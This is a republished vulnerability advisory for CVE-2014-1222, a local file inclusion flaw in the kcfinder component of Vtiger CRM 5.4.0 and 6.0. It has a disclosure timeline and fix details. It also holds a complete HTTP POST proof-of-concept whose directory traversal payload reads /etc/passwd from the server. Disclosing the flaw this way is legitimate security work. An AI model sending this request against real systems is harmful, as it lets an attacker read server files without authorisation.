Skip to content
cyberexploits
webappphptext

Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion

Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion

Published on 2014-03-12

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/32213.txt7eac4c3a
raw
CVE: 	CVE-2014-1222

Vendor: 	Vtiger

Product: 	CRM

Affected version: 	Vtiger 5.4.0, 6.0 RC & 6.0.0 GA

Fixed version: 	Vtiger 6.0.0 Security patch 1

Reported by: 	Jerzy Kramarz

Details:



A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.



The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.



POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1

Host: 192.168.56.103

Proxy-Connection: keep-alive

Content-Length: 58

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://192.168.56.103

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php

Accept-Encoding: gzip,deflate,sdch

Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4

Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off



dir=files&file=/../../../../../../../../../../../etc/passwd



Note: In order to exploit this vulnerability an attacker has to be authenticated.

Impact:



This vulnerability gives an attacker the ability to read local files from the server filesystem.

Exploit:



Exploit code is not required.



Vendor status:

23/12/2013 	Advisory created

03/01/2014 	Vendor contacted

14/01/2014 	CVE obtained

27/01/2014 	Vendor contact reattempted

10/02/2014 	Vendor working on a fix

12/02/2014 	Fix released

13/02/2014 	Fix confirmed

11/03/2014 	Published
View on GitHub